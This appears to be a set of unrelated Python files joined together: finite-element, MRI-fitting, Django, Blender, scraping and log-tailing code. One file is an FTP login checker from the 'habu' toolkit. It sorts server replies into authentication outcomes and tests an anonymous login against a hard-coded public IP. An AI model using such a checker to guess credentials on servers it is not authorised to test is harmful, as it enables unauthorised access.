K = np.zeros([nDofs, nDofs])
for eltopo, elx, ely, in zip(edof, ex, ey):
    Ke = cfc.flw2i4e(elx, ely, ep, D)
    cfc.assem(eltopo, K, Ke)
# ----- Force vector ---------------------------------------------
f = np.zeros([nDofs, 1])
# ----- Boundary conditions --------------------------------------
bc = np.array([], int)
bcVal = np.array([], int)
bc, bcVal = cfu.applybc(bdofs, bc, bcVal, left_side, 0.0)
bc, bcVal = cfu.applybc(bdofs, bc, bcVal, right_side, 10.0)
# ----- Solve equation system ------------------------------------
a, r = cfc.solveq(K, f, bc, bcVal)
ed = cfc.extractEldisp(edof, a)
# ----- Calculating element forces -------------------------------
maxFlow = []  # empty list to store flow magnitude per element
for i in range(edof.shape[0]):
    es, et, eci = cfc.flw2i4s(ex[i, :], ey[i, :], ep, D, ed[i, :])
    maxFlow.append(np.sqrt(pow(es[0, 0], 2) + pow(es[0, 1], 2)))
# ----- Visualize results ----------------------------------------
cfv.figure()
cfv.draw_geometry(g, title='Geometry')
cfv.figure()
cfv.draw_element_values(maxFlow, coords, edof, dofs_per_node, el_type, None,
                        title='Max flows')
cfv.figure()
cfv.draw_nodal_values(a, coords, edof,
                      dofs_per_node=dofs_per_node,
                      el_type=el_type)
cfv.showAndWait()
|
# -*- coding: utf-8 -*-
import os
import errno
import subprocess
import pytest
import swoopi
@pytest.mark.parametrize('supported, detected', [
    (True, True), (True, False), (False, False)
])
def test_picamera_status(monkeypatch, supported, detected):
    """picamera_status() must mirror the supported/detected flags that a
    faked ``vcgencmd`` invocation reports."""
    fake_output = 'supported={} detected={}'.format(int(supported),
                                                   int(detected))

    def fake_check_output(_):
        return fake_output

    monkeypatch.setattr('test_utils.subprocess.check_output',
                        fake_check_output)
    got_support, got_detect = swoopi.utils.picamera_status()
    assert got_support == supported
    assert got_detect == detected
def test_picamera_environment_exceptions(monkeypatch):
    """picamera_status() must report (False, False) both when vcgencmd
    exits with a non-zero status and when the binary is missing."""
    def nonzero_exception(_):
        raise subprocess.CalledProcessError(-1, 'vcgencmd', '')
    monkeypatch.setattr('test_utils.subprocess.check_output',
                        nonzero_exception)
    nonzero_support, nonzero_detect = swoopi.utils.picamera_status()
    assert nonzero_support is False and nonzero_detect is False
    def notfound_exception(_):
        raise OSError(errno.ENOENT, os.strerror(errno.ENOENT))
    monkeypatch.setattr('test_utils.subprocess.check_output',
                        notfound_exception)
    notfound_support, notfound_detect = swoopi.utils.picamera_status()
    # Fix: this assertion previously re-checked the nonzero_* results,
    # leaving the file-not-found branch completely unverified.
    assert notfound_support is False and notfound_detect is False
|
from habu.lib.auth.base import BaseAuth, ReturnCode
from ftplib import FTP, FTP_TLS, error_perm, Error as FTP_Error
import socket
import logging
# Known "530" reply strings that indicate bad credentials (as opposed to
# some other permanent error).  FTP servers word their rejections
# differently; FTPAuth.login compares str(error_perm) verbatim against
# this list.
auth_failed_messages = [
    '530 Authentication failed.',
    '530 Login authentication failed',
    '530 Login incorrect.',
    '530 Login incorrect - invalid email address',
    '530 Login or password incorrect!',
    '530 User cannot log in.',
]
class FTPAuth(BaseAuth):
    """Credential check against an FTP server.

    Connects to ``self.address:self.port`` and attempts a USER/PASS login,
    mapping the outcome onto ``ReturnCode`` values.
    """

    services = [ 'ftp' ]

    def login(self):
        """Attempt a login; returns a ReturnCode and always closes the
        control connection (it was previously leaked on every path)."""
        ftp = FTP()
        try:
            ftp.connect(host=self.address, port=self.port, timeout=3)
        except socket.timeout:
            return ReturnCode.CONN_TIMEOUT
        except ConnectionRefusedError:
            return ReturnCode.CONN_REFUSED
        try:
            ftp.login(user=self.username, passwd=self.password)
            return ReturnCode.AUTH_OK
        except error_perm as e:
            # Only 530 replies found in the known list count as a definite
            # authentication failure; anything else is a generic error.
            if str(e) in auth_failed_messages:
                return ReturnCode.AUTH_FAILED
            else:
                return ReturnCode.GENERIC_ERROR
        except Exception:
            return ReturnCode.GENERIC_ERROR
        finally:
            # Fix: release the socket regardless of which branch returned.
            ftp.close()
if __name__ == '__main__':
    # Ad-hoc manual check: anonymous login against a hard-coded public host.
    f = FTPAuth(username='anonymous', password='habu', address='150.101.135.3')
    print(f.login())
|
# import libraries
import torch
import torch.nn as nn
import torch.utils.data as utils
from tqdm import tqdm
import copy
import matplotlib.pyplot as plt
import numpy as np
import os
import model_3D as model
import matplotlib
matplotlib.use('TkAgg')
# np.random.seed(42)
# torch.manual_seed(42)
def NMSE_loss(input, target, weight=None, reduction='mean'):
    """Normalized mean-squared error: ((input - target)^2 / target^2).

    reduction='mean' collapses to a scalar (weighted by `weight` when
    given: sum(w * err) / sum(w)); reduction='eval' returns the per-row
    mean along axis 1.  Raises ValueError for any other reduction.
    """
    squared_rel_err = ((input - target) ** 2) / (target ** 2)
    if weight is None:
        if reduction == 'mean':
            return torch.mean(squared_rel_err)
        if reduction == 'eval':
            return torch.mean(squared_rel_err, axis=1)
        raise ValueError('not a valid reduction')
    weighted = weight * squared_rel_err
    if reduction == 'mean':
        return torch.sum(weighted) / torch.sum(weight)
    if reduction == 'eval':
        return torch.mean(weighted, axis=1)
    raise ValueError('not a valid reduction')
def normalize_params(pred_params, orig_params, bounds):
    """Scale parameter columns by the width of their allowed bounds.

    ``bounds`` is indexed as bounds[0, i] = lower, bounds[1, i] = upper.
    Both arrays are divided IN PLACE (the caller's data is modified);
    pred_params is transposed before scaling.

    NOTE(review): ``range(len(bounds))`` iterates over the FIRST axis of
    bounds (length 2 for a [lower, upper] pair) while ``bounds[1, i]``
    treats the SECOND axis as the parameter axis — confirm the intended
    loop bound (bounds.shape[1]?).
    """
    pred_params = pred_params.T
    for i in range(len(bounds)):
        pred_params[:, i] /= (bounds[1, i] - bounds[0, i])
        orig_params[:, i] /= (bounds[1, i] - bounds[0, i])
    return pred_params, orig_params
def train(C1, hp, net=None, Hct=None, orig_params=None):
    """Train a DCE_NET on concentration data C1 with per-sample Hct values.

    C1 is a 4-D array (sample, H, W, time); Hct is broadcast over the
    spatial axes and prepended as channel 0, so batches are laid out as
    X[:, 0] = Hct and X[:, 1:] = signal.  Trains with MSE loss, early
    stopping on validation loss, and returns the net restored to its best
    validation weights.

    NOTE(review): ``orig_params`` is accepted but never used here.
    """
    if hp.use_cuda:
        torch.backends.cudnn.benchmark = True
    if net is None:
        net = model.DCE_NET(copy.deepcopy(hp)).to(hp.device)
    # Broadcast Hct to the spatial dimensions of C1 and prepend it as an
    # extra channel; then move the time axis to the channel position.
    Hct = np.expand_dims(Hct, axis=(1, 2, 3))
    Hct = np.repeat(np.repeat(Hct, C1.shape[1], axis=1), C1.shape[2], axis=2)
    C1 = np.concatenate([Hct, C1], axis=3)
    C1 = np.moveaxis(C1, 3, 1)
    # Loss function and optimizer
    criterion = nn.MSELoss().to(hp.device)
    # Data loader
    split = int(np.floor(len(C1)*hp.training.split))
    C1 = torch.from_numpy(C1.astype(np.float32))
    train_set, val_set = torch.utils.data.random_split(C1, [split, len(C1)-split])
    trainloader = utils.DataLoader(train_set,
                                   batch_size=hp.training.batch_size,
                                   shuffle=True,
                                   num_workers=4,
                                   drop_last=True)
    valloader = utils.DataLoader(val_set,
                                 batch_size=hp.training.val_batch_size,
                                 shuffle=False,
                                 num_workers=4,
                                 drop_last=True)
    num_batches = len(train_set) // hp.training.batch_size
    num_batches2 = len(val_set) // hp.training.val_batch_size
    # Cap the number of training iterations per epoch at hp.training.totalit.
    if num_batches > hp.training.totalit:
        totalit = hp.training.totalit
    else:
        totalit = num_batches
    if not os.path.exists(hp.out_fold):
        os.makedirs(hp.out_fold)
    optimizer, scheduler = model.load_optimizer(net, hp)
    params_total = sum(p.numel() for p in net.parameters())
    train_params = sum(p.numel() for p in net.parameters() if p.requires_grad)
    # fix for sudden nan values in patient data: replace NaN gradients
    for name, p in net.named_parameters():
        if p.requires_grad:
            p.register_hook(lambda grad: torch.nan_to_num(grad))
    print(params_total, 'params in total')
    print(train_params, 'trainable params in total')
    best = 1e16
    num_bad_epochs = 0
    loss_train = []
    loss_val = []
    # Channel slice limit: channel 0 is Hct, 1:bound is the signal.
    bound = hp.max_rep+1
    for epoch in range(hp.training.epochs):
        print("-----------------------------------------------------------------")
        print("\nEpoch:{}; Current best val_loss:{}".format(epoch, best))
        train_loss = 0.
        val_loss = 0.
        # do_plots() moves timing back to the CPU, so re-move every epoch.
        hp.acquisition.timing = hp.acquisition.timing.to(hp.device)
        for i, X_batch in enumerate(tqdm(trainloader, position=0, leave=True, total=totalit), 0):
            if i == totalit:
                break
            X_batch = X_batch.to(hp.device)
            optimizer.zero_grad()
            X_pred, ke, dt, ve, vp = net(X_batch[:, 1:bound], Hct=X_batch[:, 0])
            # NOTE(review): X_pred is sliced [:, :bound] vs target [:, 1:bound]
            # — presumably X_pred has one channel fewer; confirm shapes.
            loss = criterion(X_pred[:, :bound], X_batch[:, 1:bound])
            loss.backward()
            optimizer.step()
            train_loss += loss.item()
        # evaluation
        # NOTE(review): net is not switched to eval() mode here, and the
        # zero_grad() call inside no_grad() has no effect.
        with torch.no_grad():
            for i, X_batch in enumerate(tqdm(valloader, position=0, leave=True), 0):
                X_batch = X_batch.to(hp.device)
                optimizer.zero_grad()
                X_pred, ke, dt, ve, vp = net(X_batch[:, 1:bound], Hct=X_batch[:, 0])
                loss = criterion(X_pred[:, :bound], X_batch[:, 1:bound])
                val_loss += loss.item()
        # scale losses (per-batch mean, x1000 for readability)
        train_loss = train_loss/totalit*1000
        val_loss = val_loss/num_batches2*1000
        loss_train.append(train_loss)
        loss_val.append(val_loss)
        if hp.training.optim_patience > 0:
            scheduler.step(val_loss)
        # early stopping: keep a copy of the best-so-far weights
        if val_loss < best:
            print("\n############### Saving good model ###############################")
            final_model = copy.deepcopy(net.state_dict())
            best = val_loss
            num_bad_epochs = 0
            print("\nLoss: {}; val_loss: {}; bad epochs: {}".format(train_loss,
                                                                    val_loss,
                                                                    num_bad_epochs))
        else:
            num_bad_epochs += 1
            print("\nLoss: {}; val_loss: {}; bad epochs: {}".format(train_loss,
                                                                    val_loss,
                                                                    num_bad_epochs))
            # early stopping
            if num_bad_epochs == hp.training.patience:
                print("\nEarly stopping, best val loss: {}".format(best))
                print("Done with DCE fitting")
                break
        # calculate the best, median and worst fits based on NMSE loss
        # (uses the last validation batch; curves are flattened over voxels)
        X_pred = torch.moveaxis(X_pred, 1, 3).reshape(-1, X_pred.size(1))
        X_batch = torch.moveaxis(X_batch[:, 1:], 1, 3).reshape(-1, X_pred.size(-1))
        all_losses = NMSE_loss(X_pred, X_batch, reduction='eval')
        values_top, inds_top = torch.topk(all_losses, int(len(all_losses)/2))
        values_bottom, inds_bottom = torch.topk(all_losses, 2, largest=False)
        # 2 worst, 2 median, 2 best curves (6 in total, as do_plots expects)
        values = torch.cat((values_top[:2], values_top[-2:], values_bottom))
        inds = torch.cat((inds_top[:2], inds_top[-2:], inds_bottom))
        minmax_batch_losses = X_batch[inds].cpu()
        minmax_pred_losses = X_pred[inds].cpu()
        do_plots(hp, epoch, minmax_batch_losses, minmax_pred_losses, loss_train, loss_val, values, name='dce_part')
        # do_plots_3D(hp, epoch, X_batch, X_pred, ke, ve, vp, loss_train, loss_val)
    print("Done")
    net.load_state_dict(final_model)
    return net
def do_plots(hp, epoch, X_batch, X_pred, loss_train, loss_val, values, loss_train_curve=None, loss_val_curve=None, name=None):
    """Plot measured vs predicted curves for selected voxels plus the loss
    history, optionally saving the figure to hp.out_fold.

    Expects len(values) == 6 (2 worst / 2 median / 2 best, as produced in
    train()): the loss-history panel is hard-coded at axs[3, 0].
    NOTE(review): loss_train_curve / loss_val_curve are accepted but unused.
    """
    # plot loss history
    hp.acquisition.timing = hp.acquisition.timing.cpu()
    plt.close('all')
    labels = ['worst', 'median', 'best']
    fig, axs = plt.subplots(int(len(values)/2)+1, 2, figsize=(6,5))
    # Two curves per panel: measured (X_batch) and fitted (X_pred).
    for i in range(len(values)):
        axs[int(i/2), i%2].plot(hp.acquisition.timing, X_batch.data[i])
        axs[int(i/2), i%2].plot(hp.acquisition.timing, X_pred.data[i])
        axs[int(i/2), i%2].set_title('{} {}, loss:{:.2e}'.format(labels[int(i/2)], (i%2)+1, values[i].item()))
    for ax in axs.flat:
        ax.set(xlabel='time (m)', ylabel='signal (a.u.)')
    for ax in axs.flat:
        ax.label_outer()
    # Bottom-left panel: training/validation loss history on a log scale.
    axs[3, 0].plot(loss_train)
    axs[3, 0].plot(loss_val)
    axs[3, 0].set_yscale('log')
    axs[3, 0].set_xlabel('epoch')
    axs[3, 0].set_ylabel('loss')
    plt.ion()
    plt.tight_layout()
    plt.show()
    plt.pause(0.001)
    if hp.training.save_train_fig:
        plt.gcf()
        plt.savefig('{out_fold}/{name}_fit_{epoch}.png'.format(out_fold=hp.out_fold, epoch=epoch, name=name))
    return fig
def do_plots_3D(hp, epoch, X_batch, X_pred, ke, ve, vp, loss_train, loss_val):
    """Plot 2-D parameter maps (kep, ve, vp) for the first sample plus the
    loss history; optionally saves the figure.

    NOTE(review): currently only invoked from a commented-out call in
    train(); X_batch/X_pred are sliced but not otherwise used here.
    """
    # plot loss history
    hp.acquisition.timing = hp.acquisition.timing.cpu()
    plt.close('all')
    # Drop the Hct/AIF channel when present so X_batch is signal-only.
    if hp.supervised or hp.network.aif:
        X_batch = X_batch[:, 1:]
    fig, axs = plt.subplots(2, 2)
    ax1 = axs[0, 0].imshow(ke[0].cpu().numpy().T, cmap='jet')
    axs[0, 0].set_title('kep')
    ax2 = axs[0, 1].imshow(ve[0].cpu().numpy().T, cmap='jet')
    axs[0, 1].set_title('ve')
    ax3 = axs[1, 0].imshow(vp[0].cpu().numpy().T, cmap='jet')
    axs[1, 0].set_title('vp')
    fig.colorbar(ax1, ax=axs[0, 0])
    fig.colorbar(ax2, ax=axs[0, 1])
    fig.colorbar(ax3, ax=axs[1, 0])
    # Fourth panel: loss history on a log scale.
    axs[1, 1].plot(loss_train)
    axs[1, 1].plot(loss_val)
    axs[1, 1].set_yscale('log')
    axs[1, 1].set_xlabel('epoch')
    axs[1, 1].set_ylabel('loss')
    plt.ion()
    plt.tight_layout()
    plt.show()
    plt.pause(0.001)
    if hp.training.save_train_fig:
        plt.gcf()
        # NOTE(review): saved under 'dce-part' while do_plots uses 'dce_part'
        # — confirm the naming difference is intentional.
        plt.savefig('{out_fold}/{name}_fit_{epoch}.png'.format(out_fold=hp.out_fold, epoch=epoch, name='dce-part'))
|
#!/usr/bin/env python3
import pysam
import sys
if __name__ == '__main__':
    # Print each variant as "CHROM:POS-REF/ALT[,ALT...]", reading from the
    # VCF given on the command line or from stdin when no path is given.
    if len(sys.argv) > 2:
        sys.exit("Usage: {} [in.vcf]".format(sys.argv[0]))
    if len(sys.argv) > 1:
        vcf = pysam.VariantFile(sys.argv[1])
    else:
        vcf = pysam.VariantFile('-')
    # Fix: removed the unused `pos_offset = 1000000` dead variable.
    for record in vcf:
        print("{}:{}-{}/{}".format(record.chrom,
                                   record.pos,
                                   record.ref,
                                   ','.join(record.alts)))
    vcf.close()
|
####################
# ES-DOC CIM Questionnaire
# Copyright (c) 2017 ES-DOC. All rights reserved.
#
# University of Colorado, Boulder
# http://cires.colorado.edu/
#
# This project is distributed according to the terms of the MIT license [http://www.opensource.org/licenses/MIT].
####################
"""
.. module:: admin_customizations
Summary of module goes here
"""
from django.contrib import admin
from django.forms import ModelForm
from Q.questionnaire.models.models_customizations import QModelCustomization, QCategoryCustomization, QPropertyCustomization
from Q.questionnaire.q_utils import update_field_widget_attributes
# these next few classes let me view all the QPropertyCustomizations and/or QCategoryCustomizations belonging to a given QModelCustomization and/or QCategoryCustomization
class QPropertyCustomizationInlineForm(ModelForm):
    """
    Empty ModelForm for QPropertyCustomization: renders no editable fields.
    Used with a StackedInline so the inline shows only a change link.
    """
    class Meta:
        model = QPropertyCustomization
        fields = []  # intentionally empty: the inline is navigation-only
class QPropertyCustomizationInline(admin.StackedInline):
    """
    StackedInline listing a parent's QPropertyCustomizations with a link
    to each instance's own admin page (no fields edited in place).
    """
    model = QPropertyCustomization
    form = QPropertyCustomizationInlineForm
    show_change_link = True  # renders the per-row "change" link
    extra = 0  # no blank extra rows
class QCategoryCustomizationInlineForm(ModelForm):
    """
    Empty ModelForm for QCategoryCustomization: renders no editable fields.
    Used with a StackedInline so the inline shows only a change link.
    """
    class Meta:
        model = QCategoryCustomization
        fields = []  # intentionally empty: the inline is navigation-only
class QCategoryCustomizationInline(admin.StackedInline):
    """
    StackedInline listing a parent's QCategoryCustomizations with a link
    to each instance's own admin page (no fields edited in place).
    """
    model = QCategoryCustomization
    form = QCategoryCustomizationInlineForm
    show_change_link = True  # renders the per-row "change" link
    extra = 0  # no blank extra rows
# now define the actual admins & forms...
class QPropertyCustomizationAdminForm(ModelForm):
    """Explicit field list for editing a QPropertyCustomization in the admin."""
    class Meta:
        model = QPropertyCustomization
        fields = [
            "name",
            "project",
            "proxy",
            "model_customization",
            "category_customization",
            "property_title",
            "is_required",
            "is_hidden",
            "is_editable",
            "is_nillable",
            "property_description",
            "inline_help",
            "order",
            "field_type",
            "can_inherit",
            "default_values",
            "atomic_type",
            "atomic_suggestions",
            "enumeration_is_open",
            "relationship_show_subforms",
            # TODO: relationship_target_model_customizations
            # "relationship_target_model_customizations",
        ]
class QPropertyCustomizationAdmin(admin.ModelAdmin):
    """
    Custom ModelAdmin for QPropertyCustomization; uses an explicit form so
    only the whitelisted fields are editable.
    """
    form = QPropertyCustomizationAdminForm
class QCategoryCustomizationAdminForm(ModelForm):
    """Explicit field list for editing a QCategoryCustomization in the admin."""
    class Meta:
        model = QCategoryCustomization
        fields = [
            "name",
            "project",
            "proxy",
            "model_customization",
            "order",
            "category_title",
            "category_description",
            "is_hidden",
        ]
class QCategoryCustomizationAdmin(admin.ModelAdmin):
    """
    Custom ModelAdmin for QCategoryCustomization.
    Provides an inline for browsing its QPropertyCustomizations.
    """
    inlines = (QPropertyCustomizationInline,)
    form = QCategoryCustomizationAdminForm
class QModelCustomizationAdminForm(ModelForm):
    """Explicit field list for editing a QModelCustomization in the admin."""
    class Meta:
        model = QModelCustomization
        fields = [
            "name",
            "owner",
            "shared_owners",
            "project",
            "proxy",
            "synchronization",
            "order",
            "documentation",
            "is_default",
            "model_title",
            "model_description",
            "model_hierarchy_title",
            "model_show_empty_categories",
        ]
class QModelCustomizationAdmin(admin.ModelAdmin):
    """
    Custom ModelAdmin for QModelCustomization.
    Provides inlines for browsing its QCategoryCustomizations and
    QPropertyCustomizations.
    """
    inlines = (QCategoryCustomizationInline, QPropertyCustomizationInline,)
    form = QModelCustomizationAdminForm
# Register the customization models with their custom ModelAdmins.
admin.site.register(QModelCustomization, QModelCustomizationAdmin)
admin.site.register(QCategoryCustomization, QCategoryCustomizationAdmin)
admin.site.register(QPropertyCustomization, QPropertyCustomizationAdmin)
|
# load the pypes framework
from pkg_resources import require
require('pypes')
import re
import time
from pypes.pipeline import Dataflow
from pypes.component import Component
class Tail(Component):
    """pypes adapter that follows an open file (like `tail -f`), sending
    each new stripped line on its 'out' port.

    NOTE(review): run() is a pypes scheduler coroutine; the exact
    receive/yield_ctrl ordering is part of the framework's contract.
    """
    __metatype__ = 'ADAPTER'
    def __init__(self, fp):
        Component.__init__(self)
        self.fp = fp
    def run(self):
        # Seek to the end of the file so only new lines are emitted.
        self.fp.seek(0,2)
        while True:
            # Drain the (unused) input packet that triggers this component.
            self.receive('in')
            line = self.fp.readline()
            if line:
                self.send('out', line.strip())
            else:
                # Nothing new yet: hand control back to the scheduler.
                self.yield_ctrl()
class Grep(Component):
    """pypes transformer that forwards only lines matching `pattern`.

    Uses re.match, i.e. the pattern must match at the START of the line.
    """
    __metatype__ = 'TRANSFORMER'
    def __init__(self, pattern):
        Component.__init__(self)
        # Compile once; matched against every incoming line.
        self.regex = re.compile(pattern)
    def run(self):
        while True:
            for line in self.receive_all('in'):
                if self.regex.match(line):
                    self.send('out', line)
            self.yield_ctrl()
class Printer(Component):
    """pypes publisher that prints every packet it receives to stdout."""
    __metatype__ = 'PUBLISHER'
    def __init__(self):
        Component.__init__(self)
    def run(self):
        while True:
            for data in self.receive_all('in'):
                print(data)
            self.yield_ctrl()
# Wire tail -> grep -> printer into a pypes Dataflow and drive it forever.
# The file handle is deliberately left open for the lifetime of the process.
tail = Tail(open('/var/log/syslog', 'r'))
grep = Grep('.*pants.*')
printer = Printer()
pipe = Dataflow({
    tail: {grep:('out','in')},
    grep: {printer:('out', 'in')}
})
# Each send(None) ticks the pipeline; sleep throttles the polling loop.
while True:
    pipe.send(None)
    time.sleep(0.1)
|
'''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
hello@cgcookie.com
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import sys
import math
import time
import random
import asyncio
import inspect
import traceback
import contextlib
from math import floor, ceil
from inspect import signature
from itertools import dropwhile, zip_longest
from concurrent.futures import ThreadPoolExecutor
from .ui_utilities import UI_Element_Utils
from .ui_settings import DEBUG_COLOR_CLEAN, DEBUG_PROPERTY, DEBUG_COLOR, DEBUG_DIRTY, DEBUG_LIST, CACHE_METHOD, ASYNC_IMAGE_LOADING
import bpy
import bgl
import blf
import gpu
from .blender import tag_redraw_all
from .ui_styling import UI_Styling, ui_defaultstylings
from .ui_utilities import helper_wraptext, convert_token_to_cursor
from .drawing import ScissorStack, FrameBuffer
from .fsm import FSM
from .useractions import ActionHandler
from .boundvar import BoundVar
from .debug import debugger, dprint, tprint
from .decorators import debug_test_call, blender_version_wrapper, add_cache
from .drawing import Drawing
from .fontmanager import FontManager
from .globals import Globals
from .hasher import Hasher
from .maths import Vec2D, Color, mid, Box2D, Size1D, Size2D, Point2D, RelPoint2D, Index2D, clamp, NumberUnit
from .maths import floor_if_finite, ceil_if_finite
from .profiler import profiler, time_it
from .utils import iter_head, any_args, join, abspath
class LineFitter:
    """Lays out elements left-to-right in lines inside a fixed Box2D,
    starting a new line whenever an element does not fit."""

    def __init__(self, *, left, top, width, height):
        self.box = Box2D(left=left, top=top, width=width, height=height)
        self.max_width = 0    # widest completed line so far
        self.sum_height = 0   # total height of completed lines
        self.lines = []       # completed lines (lists of elements)
        self.current_line = None
        self.new_line()       # initializes current_line/width/height

    def new_line(self):
        """Commit the current line (if non-empty) and start a fresh one."""
        # width: sum of all widths added to current line
        # height: max of all heights added to current line
        if not self.is_current_line_empty():
            self.max_width = max(self.max_width, self.current_width)
            self.sum_height = self.sum_height + self.current_height
            # Fix: was `self.lines.append(self.current.elements)`, which
            # raised AttributeError (no `self.current` attribute exists).
            self.lines.append(self.current_line)
        self.current_line = []
        self.current_width = 0
        self.current_height = 0

    def is_current_line_empty(self):
        return not self.current_line

    @property
    def remaining_width(self): return self.box.width - self.current_width

    @property
    def remaining_height(self): return self.box.height - self.sum_height

    def get_next_box(self):
        """Box covering the space to the right of / below current content."""
        return Box2D(
            left   = self.box.left + self.current_width,
            top    = -(self.box.top + self.sum_height),
            width  = self.box.width - self.current_width,
            height = self.box.height - self.sum_height,
        )

    def add_element(self, element, size):
        """Place element at the current position, wrapping first if needed;
        returns the Box2D it was assigned."""
        # assuming element is placed in correct spot in line
        if not self.fit(size): self.new_line()
        pos = Box2D(
            left   = self.box.left + self.current_width,
            top    = -(self.box.top + self.sum_height),
            width  = size.smallest_width(),
            height = size.smallest_height(),
        )
        self.current_line.append(element)
        self.current_width += size.smallest_width()
        self.current_height = max(self.current_height, size.smallest_height())
        return pos

    def fit(self, size):
        """True if `size` fits in the remaining space of the current line."""
        if size.smallest_width() > self.remaining_width: return False
        if size.smallest_height() > self.remaining_height: return False
        return True
class TableFitter:
    """Grid layout counterpart of LineFitter (work in progress)."""
    def __init__(self):
        self._cells = {} # keys are Index2D
        self._index = Index2D(0, 0)
    def new_row(self):
        # Reset column index and advance the row by one.
        # NOTE(review): relies on the project's Index2D.update(i=, j_off=)
        # semantics — confirm j_off is a relative row offset.
        self._index.update(i=0, j_off=1)
    def new_col(self):
        # Not implemented yet.
        pass
|
import os
from bs4 import BeautifulSoup
import requests
import json
import concurrent.futures
import time
def char_case(argument):
    """Map a user-entered character name to its canonical Danbooru tag.

    Looks `argument` up in characters.json and returns the mapped value,
    or the argument unchanged when no entry exists.  Exits cleanly when
    the JSON file is missing (the program cannot work without it).
    """
    # ---Function to clean the character's names when searching in Danbooru---
    # Checks the text inputted to see if it's in the JSON:
    try:
        with open("characters.json") as chars_in_jason:
            switcher = json.load(chars_in_jason)
    except FileNotFoundError as e:
        print("JSON file not found, please place the file in the same folder/directory as this program")
        print(e)
        input("Press Enter to end the program \n")
        # Fix: previously execution fell through to `switcher.get(...)` with
        # `switcher` undefined, crashing with a NameError instead of exiting.
        raise SystemExit(1)
    # get() returns the mapped value when present, otherwise the argument
    # itself (identity mapping for unknown names).
    return switcher.get(argument, argument)
# The search engine where you input the character's name, switches any space to underscore and lowercases the string.
character_source = input("What character would you like to search: \n").lower()
character_source = character_source.replace(" ","_")
character_source = char_case(character_source)
if (character_source == "exit"):
    exit()
print(character_source)
start_time = time.perf_counter()
# Then it takes the tag and adds it to the full https link to use it to parse.
source = requests.get(f"https://safebooru.donmai.us/posts?tags={character_source}").text
# This is where BeautifulSoup comes into play for parsing the sections necessary till it narrows it down to the images section.
# NOTE(review): this drill-down assumes Danbooru's current page structure;
# any of these finds returns None (and the next line raises) if it changes.
soup = BeautifulSoup(source, 'lxml')
body = soup.body
img = body.find('div', id='page')
c_post = img.find('div', id='c-posts')
a_index = c_post.find('div', id='a-index')
main_content = a_index.find('section', id='content')
posts_1 = main_content.find('div', id='posts')
posts_2 = posts_1.find('div', id='posts-container')
# This piece here checks if there are any images at all on the webpage. Then makes a directory if not existing.
if(len(posts_2) > 5):
    try:
        os.mkdir(character_source)
        print("Directory " , character_source , " has been created.\n")
    except FileExistsError:
        print("Directory " , character_source , " already exists.\n")
else:
    # Kills the program because no results were found.
    print("No images found.")
    end = input("Press Enter to end the program \n")
    exit()
# The section which nets all the images and puts it in the directory the program utilizes.
def download_images(character_images):
    """Download one post's image into the `character_source` directory,
    skipping files that already exist.  `character_images` is an <article>
    tag carrying a 'data-file-url' attribute."""
    x = character_images['data-file-url']
    # Fix: use the URL's last path segment as the filename (the previous
    # hard-coded index [4] depended on the exact URL depth) and build the
    # local path portably instead of hard-coding the Windows '\\' separator.
    filename = x.split('/')[-1]
    dest = os.path.join(character_source, filename)
    if os.path.exists(dest):
        print(f"File {x} already Exist.")
    else:
        # The downloading segment.
        print(f"Downloading {x}...")
        second_request = requests.get(x)
        with open(dest, 'wb') as f:
            f.write(second_request.content)
# Download all found images concurrently, one thread per <article> tag.
with concurrent.futures.ThreadPoolExecutor() as executor:
    executor.map(download_images, posts_2.find_all('article'))
# End of the line.
end_time = time.perf_counter()
print(f"all possible images have successfully been downloaded in {round(end_time-start_time, 2)} seconds.")
end = input("Press Enter to end the program \n")
|
from django import forms
from metashare.oaipmh import supported_commands
class HarvestForm(forms.Form):
    """
    Settings form for OAI-PMH import (harvesting records from a remote
    OAI-PMH server): target URL, verb, metadata format, and the optional
    selective-harvesting arguments (item id, from/until datestamps, set).
    """
    base_URL = forms.URLField(label=u"OAI-PMH server URL",
                initial=u"http://www.language-archives.org/cgi-bin/olaca3.pl",
                help_text=u"The OAI-PMH domain name that handles OAI-PMH verbs",)
    # Verb choices come from the commands the oaipmh module supports.
    verb = forms.ChoiceField(label=u"What to do",
                choices=[(name, name) for name in supported_commands.keys()],
                help_text=u"Select OAI-PMH action " \
                    "(fill out item id if applicable)",)
    metadata_format = forms.CharField(
                label=u"Metadata format",
                help_text=u"Use list metadata for choices",
                initial=u"olac",
                required=False,)
    itemid = forms.CharField(label=u"Record ID",
                help_text=u"Leave empty for the whole collection or " \
                    "if not applicable",
                required=False,)
    # from/set are trailing-underscored because `from` and `set` are a
    # Python keyword and a builtin, respectively.
    from_ = forms.CharField(label=u"From",
                help_text=u"Lower bound for datestamp-based selective " \
                    "harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
                required=False,)
    until = forms.CharField(label=u"Until",
                help_text=u"Upper bound for datestamp-based selective " \
                    "harvesting. e.g '2011-02-01T12:00:00Z' or '2011-02-01'",
                required=False,)
    set_ = forms.CharField(label=u"Set",
                help_text=u"Leave empty for the whole collection or " \
                    "if not applicable",
                required=False,)
class ExposeForm(forms.Form):
    """
    Settings form for OAI-PMH expose requests (the previous docstring said
    "import", apparently copied from HarvestForm): verb, metadata format,
    and the optional selective arguments including a resumption token.
    """
    VERBS = (('Identify', 'Identify Server'),
             ('GetRecord', 'Get Record'),
             ('ListIdentifiers', 'List Identifiers'),
             ('ListMetadataFormats', 'List Formats'),
             ('ListRecords', 'List Records'),
             ('ListSets', 'List Sets'),)
    FORMATS = (('', '-----------'),
               ('metashare', 'metashare'),
               ('olac', 'olac'),
               ('cmdi', 'cmdi'))
    verb = forms.ChoiceField(label=u"What to do",
                choices=VERBS,
                help_text=u"Select OAI-PMH verb " \
                    "(fill out item identifier if applicable)",)
    metadata_str = forms.ChoiceField(label=u"OAI-PMH metadata format",
                choices=FORMATS,
                help_text=u"Select a metadata format if applicable " \
                    "with the specified verb",
                required=False,)
    itemid = forms.CharField(label=u"Item Identifier",
                help_text=u"Leave empty for the whole collection or " \
                    "if not applicable",
                required=False,)
    # from/set are trailing-underscored because `from` and `set` are a
